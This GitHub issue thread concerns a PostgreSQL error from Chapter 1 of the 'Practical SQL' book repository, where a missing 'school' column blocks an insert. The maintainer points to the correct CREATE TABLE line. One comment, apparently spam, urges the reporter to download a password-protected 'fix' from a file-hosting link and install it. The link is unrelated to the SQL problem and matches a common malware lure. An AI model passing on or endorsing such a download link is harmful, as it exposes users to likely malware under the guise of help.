### ISSUE TITLE
Chapter 1: column "school" of relation "teachers" does not exist

### ISSUE THREAD

**Issue by tiergan-rey** [anthonydb/practical-sql#45]
Windows 10

yes, followed download instructions

using PostgreSQL 16.4 and pgAdmin 8.10

Yes all code was copied from github

Missing school column in order to insert data

1st edition Chapter 1, page 8 and Chapter_01.sql

The code given to create the table does not include a column for the schools but the insert into snippet does make it un-executable unless the column is added or the schools removed. Following the 1st edition of the book so not sure if this has already been seen to. 

![Screenshot (18)](https://github.com/user-attachments/assets/8f73ea96-8a86-4158-bbf9-36f0b4d69ac0)
the column tab on the left shows the missing school column

ERROR:  column "school" of relation "teachers" does not exist

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by anthonydb** [comment]
It doesn't look like you created the table correctly. The `CREATE TABLE` statement has a school column:
https://github.com/anthonydb/practical-sql/blob/main/Chapter_01/Chapter_01.sql#L14
